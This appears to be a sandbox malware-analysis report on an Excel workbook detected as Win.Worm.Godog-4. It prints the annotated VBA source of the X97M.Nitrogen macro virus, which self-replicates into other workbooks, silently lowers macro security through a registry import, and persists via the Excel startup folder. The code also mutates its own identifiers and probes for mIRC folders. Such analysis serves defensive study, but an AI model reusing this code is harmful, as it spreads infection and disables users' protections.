MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1140 Deobfuscate/Decode Files or Information
T1059 Command and Scripting Interpreter
The VBA macro attempts to disable Excel's macro security by writing a .reg file that sets HKCU\Software\Microsoft\Office\9.0\Excel\Security\Level to 1 and importing it with 'regedit /s C:\Protection.reg'. It also attempts to establish persistence by saving a copy of the workbook named 'Book.' in the Excel startup path. The ClamAV detection of Win.Worm.Godog-4 further supports the malicious nature of this file.
Heuristics 4
-
ClamAV: Win.Worm.Godog-4 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Win.Worm.Godog-4
-
VBA macros detected — medium — 2 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9752 bytes |

SHA-256: f225b70b5fc5f4416c143dc723be446731ee02069658a40ea39e23b7de7c7b2f
Detection — ClamAV: Win.Worm.Godog-4
Obfuscation or payload: unlikely
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "EsteLivro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst notes (added during review; the macro code itself is unchanged):
' - Module name "EsteLivro" (Portuguese for "this book"). VB_PredeclaredId = True
'   and VB_Exposed = True are what a document-class module carries, so this is
'   presumably the workbook's ThisWorkbook module -- TODO confirm from the OLE
'   stream name.
' - The two comment lines that follow are a self-identifying marker, not just an
'   author tag: WorkBook_DeActivate reads line 1 of a target code module and
'   compares it with exactly "'X97M.Nitrogen" to decide whether that module has
'   already been infected.
'X97M.Nitrogen
'By ·KrïPt¤R·
' Workbook activation handler. VBA identifiers are case-insensitive, so this
' presumably binds to the Workbook_Activate event and runs whenever the
' infected workbook becomes the active window. It does nothing itself and
' hands off to WorkBook_DeActivate, which holds the actual payload, so the
' payload runs on both activation and deactivation.
Sub WorkBook_Activate()
Call WorkBook_DeActivate
End Sub
' Main payload; by its (case-insensitive) name also the Workbook_Deactivate
' handler. Every run-time error is swallowed, so any step that fails -- VBA
' project access denied, a missing registry key, a non-writable C:\ -- is
' skipped silently and the remaining steps still execute.
Sub WorkBook_DeActivate()
On Error Resume Next
' --- Self-replication ---
' QP6619 = first VBComponent of whichever workbook is currently active (not
' necessarily this one); ST4I979 = first VBComponent of this workbook (Me).
Set QP6619 = ActiveWorkbook.VBProject.VBComponents.Item(1)
Set ST4I979 = Me.VBProject.VBComponents.Item(1)
' Infection-marker check: if the target module's first line is not the
' "'X97M.Nitrogen" tag, copy this module's entire source into it and rename
' the component. Both calls need programmatic access to the VBA project.
If QP6619.CodeModule.Lines(1, 1) <> "'X97M.Nitrogen" Then
QP6619.CodeModule.insertlines 1, ST4I979.CodeModule.Lines(1, ST4I979.CodeModule.CountOfLines)
QP6619.Name = "EsteLivro"
End If
' --- Registry tampering through a transient .reg file ---
' Writes a REGEDIT4 file that sets two HKCU values: Office\8.0\Excel\Microsoft
' Excel\Options6 = 0 and Office\9.0\Excel\Security\Level = 1 (per the report
' summary the latter lowers Excel's macro security; Options6 presumably holds
' the Excel 97 macro-warning preference -- not verifiable from this listing).
Open "C:\Protection.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1, ""
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]"
Print #1, """Options6""=dword:00000000"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]"
Print #1, """Level""=dword:00000001"
Close #1
' Silent import (regedit /s) in a hidden window, immediately followed by
' deletion of the file, so C:\Protection.reg exists only briefly; the HKCU
' value changes are the durable artifact to look for.
Shell "regedit /s C:\Protection.reg", vbHide: Kill ("C:\Protection.reg")
' --- Persistence (MITRE T1547.001 per the report) ---
' If no file "Book." exists in Excel's startup path, save this workbook there
' in xlNormal format without adding it to the recent-files list. Note the
' bare name with a trailing dot and no extension.
FJ397492 = Dir(Application.StartupPath & "\Book.")
If FJ397492 = "" Then
VBAProject.EsteLivro.SaveAs Filename:=Application.StartupPath & "\Book.", FileFormat:=xlNormal, AddToMru:=False
End If
' Deletes the 11th control of the Tools command bar; which menu entry that is
' depends on the Excel version (presumably the Macro submenu) -- unverified.
Application.CommandBars("Tools").Controls(11).Delete
' QN471657 is never assigned in the visible code, so LL61LTAS receives Empty.
' LL61LTAS (defined further down, truncated in this preview) tests for
' c:\mirc\mirc.ini and c:\mirc32\mirc.ini; FJ74107 and EG860806 are not
' visible in this excerpt.
LL61LTAS (QN471657)
' Rewrites the macro's own identifiers to random names (see FC774323_QR344227).
FC774323_QR344227
FJ74107
' Time-gated trigger: EG860806 runs only when the current second equals the
' current minute, i.e. on a small fraction of activations.
If Second(Now) = Minute(Now) Then
EG860806
End If
End Sub
' Self-mutation driver. Lists 36 identifiers this module uses (object
' variables, locals, procedure names) and replaces each one in the active
' workbook's first code module with a freshly generated random name, so the
' identifiers differ after every run. Since the report's ClamAV signature
' still fires on this already-mutated sample, detection evidently does not
' depend on these names.
Private Sub FC774323_QR344227()
On Error Resume Next
Randomize
Dim r1(1 To 36) As String
r1(1) = "QP6619": r1(2) = "LM320830": r1(3) = "PK446225": r1(4) = "PN543411": r1(5) = "QR344227": r1(6) = "FC774323": r1(7) = "ML652474": r1(8) = "BL810720": r1(9) = "BC33330": r1(10) = "OM239590": r1(11) = "DJ163619": r1(12) = "TK6874": r1(13) = "CF479771": r1(14) = "GL869566": r1(15) = "AL738775": r1(16) = "EO641461": r1(17) = "KF855428": r1(18) = "QR546310": r1(19) = "TK764384": r1(20) = "KL46613": r1(21) = "EG860806": r1(22) = "FJ74107": r1(23) = "AB65312": r1(24) = "CO179408": r1(25) = "JS117332": r1(26) = "RN483466": r1(27) = "LI140450": r1(28) = "GC2316": r1(29) = "NQ275360": r1(30) = "BA328324": r1(31) = "BQ8813": r1(32) = "PR464137": r1(33) = "IS509669": r1(34) = "NG189638": r1(35) = "HT682844": r1(36) = "FJ397492"
' Random name = two letters from A..T (Chr(65 + 0..19)) followed by two
' integers in 0..899. There is no collision check against existing names;
' x and a1 are undeclared (no Option Explicit), hence implicit Variants.
For x = 1 To 36
a1 = (Chr(65 + Int(Rnd * 20))) & (Chr(65 + Int(Rnd * 20))) & Int(Rnd * 900) & Int(Rnd * 900)
Call QR344227(a1, r1(x))
Next x
End Sub
' Whole-word find-and-replace of one identifier inside the active workbook's
' first code module. BL810720 = replacement text (untyped, so an implicit
' Variant); ML652474 = identifier to replace. The Dim list below redeclares
' every name from the r1() table as a local Long, presumably so those tokens
' also occur in this procedure's own source and get rewritten along with the
' rest -- TODO confirm.
Private Sub QR344227(BL810720, ML652474 As String)
On Error Resume Next
Dim QP6619 As Long: Dim LM320830 As Long: Dim PK446225 As Long: Dim PN543411 As Long: Dim BC33330 As Long: Dim OM239590 As Long: Dim DJ163619 As Long: Dim TK6874 As Long: Dim CF479771 As Long: Dim GL869566 As Long: Dim AL738775 As Long: Dim EO641461 As Long: Dim KF855428 As Long: Dim QR546310 As Long: Dim TK764384 As Long: Dim KL46613 As Long: Dim EG860806 As Long: Dim FJ74107 As Long: Dim AB65312 As Long: Dim CO179408 As Long: Dim JS117332 As Long: Dim RN483466 As Long: Dim LI140450 As Long: Dim GC2316 As Long: Dim NQ275360 As Long: Dim BA328324 As Long: Dim BQ8813 As Long: Dim PR464137 As Long: Dim IS509669 As Long: Dim NG189638 As Long: Dim HT682844 As Long: Dim FJ397492 As Long
With ActiveWorkbook.VBProject.VBComponents.Item(1).CodeModule
' Search window: line 1, column 1 through the last line and last column of
' the module.
QP6619 = 1: LM320830 = 1: PK446225 = .CountOfLines: PN543411 = Len(.Lines(.CountOfLines, 1))
' CodeModule.Find updates the four position arguments in place to the bounds
' of the match; the trailing True is the WholeWord flag.
Do While .Find(ML652474, QP6619, LM320830, PK446225, PN543411, True)
s1 = .Lines(QP6619, 1)
' Splice: text before the match, the replacement, then the text from the
' match's end column onward (s1 is an undeclared implicit Variant).
s1 = Left(s1, LM320830 - 1) & BL810720 & Mid(s1, PN543411)
.replaceline QP6619, s1
' Resume on the line after the match, so a second occurrence on the same
' line is not replaced in this pass; the window end is reset to the module's
' current end because the line count may have changed.
QP6619 = PK446225 + 1: LM320830 = 1
PK446225 = .CountOfLines
PN543411 = Len(.Lines(.CountOfLines, 1))
Loop
End With
End Sub
Function LL61LTAS(QN471657)
Set PN543411 = CreateObject("ActiveWorkbook.FileSystemObject")
If LM320830 <> "" Then
J4J816NH = F717E3P1.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If PN543411.fileexists("c:\mirc\mirc.ini") Then
LM320830 = "c:\mirc"
ElseIf PN543411.fileexists("c:\mirc32\mirc.ini") Then
LM320830 = "c:\mirc3
... (truncated)